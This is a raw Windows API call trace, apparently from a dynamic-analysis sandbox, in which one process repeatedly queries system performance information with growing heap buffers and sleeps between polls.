[0197.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.457] Sleep (dwMilliseconds=0x110) [0197.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.474] Sleep (dwMilliseconds=0x110) [0197.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.489] Sleep (dwMilliseconds=0x110) [0197.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.504] Sleep (dwMilliseconds=0x110) [0197.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.521] Sleep (dwMilliseconds=0x110) [0197.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.536] Sleep (dwMilliseconds=0x110) [0197.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.549] Sleep (dwMilliseconds=0x110) [0197.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.622] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.626] Sleep (dwMilliseconds=0x110) [0197.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.645] Sleep (dwMilliseconds=0x110) [0197.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.660] Sleep (dwMilliseconds=0x110) [0197.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.678] Sleep (dwMilliseconds=0x110) [0197.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.691] Sleep (dwMilliseconds=0x110) [0197.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.710] Sleep (dwMilliseconds=0x110) [0197.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.721] Sleep (dwMilliseconds=0x110) [0197.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 